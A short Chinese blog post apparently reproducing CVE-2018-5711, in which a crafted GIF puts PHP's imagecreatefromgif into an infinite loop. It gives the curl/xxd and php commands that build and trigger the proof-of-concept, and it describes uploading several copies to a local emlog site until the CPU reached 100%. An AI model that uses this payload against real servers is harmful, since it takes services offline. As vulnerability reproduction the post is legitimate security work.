复现CVE-2018-5711:一张gif图片让服务器崩溃

refer:http://www.freebuf.com/vuls/161262.html

$ curl -L https://git.io/vN0n4 | xxd -r > poc.gif
$ php -r 'imagecreatefromgif("poc.gif");'
  Infinite loop here...
就是生成一张图片,然后找个php程序上传,在我本地测试emlog,在emlog后台上传这张gif,一张还好,后来连续上传了三四张这样的gif,cpu直接飙升到100% 

谨以此贴以纪念。附poc图片

poc.zip

相关推荐

发表评论

路人甲
看不清楚?点图切换

网友评论(1)

这么可怕的么啊
森七 6年前 (2018-02-01) 回复